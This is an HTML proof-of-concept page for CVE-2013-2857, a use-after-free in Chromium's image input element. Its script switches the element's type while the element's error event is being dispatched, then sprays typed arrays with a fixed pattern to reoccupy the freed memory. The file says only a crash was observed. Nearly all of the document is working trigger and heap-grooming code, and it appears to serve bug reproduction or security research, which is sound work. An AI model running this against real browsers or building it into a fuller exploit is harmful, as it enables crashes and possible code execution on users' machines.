<!--
Tested on 5.5.1 (the exact engine/build is not recorded here)
CVE-2013-2857
Use after free: https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: the bug is present — loading this page crashes, presumably in the renderer.
-->
<html>
<body>
<script>
/*
fast/forms/image/image-error-event-crash.html
https://bugs.chromium.org/p/chromium/issues/detail?id=240124
*/
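/**
 * Error-event handler for the <input type="image"> below (wired via onerror="UaF()").
 *
 * Reproduces CVE-2013-2857 (Chromium bug 240124): while the element's error
 * event is being dispatched, the element's type is switched away from "image".
 * Per the file header and the linked bug, that switch is the use-after-free
 * trigger. The typed-array allocations that follow look intended to reoccupy
 * the freed memory with a recognisable 0xFFFF0000 pattern; the file only
 * reports a crash, so treat the reclaim as unverified.
 *
 * No parameters, no return value; the only side effect is on the DOM element.
 * Kept in ES5 syntax on purpose so the PoC still loads in the old target build.
 */
function UaF(){
    // Declared locally: the original leaked `x` as an implicit global.
    var x = document.getElementById("x");
    if (!x) {
        // Nothing to trigger on — fail loudly instead of with a TypeError.
        console.log("element #x not found");
        return;
    }
    console.log("test1");//prints "test1"

    // Trigger point: changing the type during onerror dispatch is what the
    // linked bug describes as the use-after-free condition.
    x.type="";

    // Heap grooming after the free: 0x10 buffers of 0x1000 x 4 bytes (16 KiB)
    // each, filled with 0xFFFF0000. `arr` is sized 0x100 but only 0x10 slots are
    // used; it keeps the buffers alive until the handler returns.
    var arr = new Array(0x100);
    for(var i = 0; i < 0x10; i++){
        arr[i] = new Uint32Array(0x1000);
        for(var j = 0; j < 0x1000; j++)
            arr[i][j] = 0xFFFF0000;
    }
    console.log("test");//prints "test"
    // Observed: prints a blank line after the type change; with `x.type=""`
    // removed it printed `<input id="x" type="image" onerror="UaF()" src>`.
    console.log(x);
}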
</script>
<input id="x" type="image" onerror="UaF()" src="" />
</body>
</html>